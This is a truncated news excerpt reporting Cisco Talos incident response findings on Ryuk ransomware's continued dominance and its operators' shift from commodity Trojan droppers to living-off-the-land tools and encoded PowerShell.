Ryuk has dominated the ransomware threat landscape for the fourth consecutive quarter, Cisco Talos researchers report in an analysis of incident response trends. Its operators are changing strategy, posing greater risk to organizations whose response efforts are impeded by COVID-19.
Ransomware continued to make up the majority of threats observed by the Cisco Talos Incident Response (CTIR) team, which today published its analysis of summer incident response trends. Ryuk has been a top ransomware threat to customers over the last year, says Sean Mason, general manager of CTIR, though the team also sees other families, including Phobos and Maze.
Over the past few quarters, Ryuk has evolved in ways that indicate its operators are shifting their tactics, Mason explains, pointing to an example: "We do see an emerging trend in Ryuk, where it is not necessarily preceded by a commodity Trojan infection, which may allow it to go undetected for some time and lead to the increased infections we are seeing," he says.
CTIR is seeing fewer incidents in which Emotet and TrickBot serve as the initial dropper for Ryuk ransomware, one of the reasons why there are fewer attacks using commodity Trojans overall. Its operators have shifted to living-off-the-land tools, which can help them bypass security tools, stay quiet, and give them a longer time frame to achieve their goals.
"By limiting the noise and doing their best to blend in, they may be able to avoid detection and buy more time in which to traverse the network and accomplish their objectives," Mason notes.
The ransomware has evolved in other ways as well. Ryuk used encoded PowerShell commands to download the ini ..
Support the originator by clicking the read the rest link below.
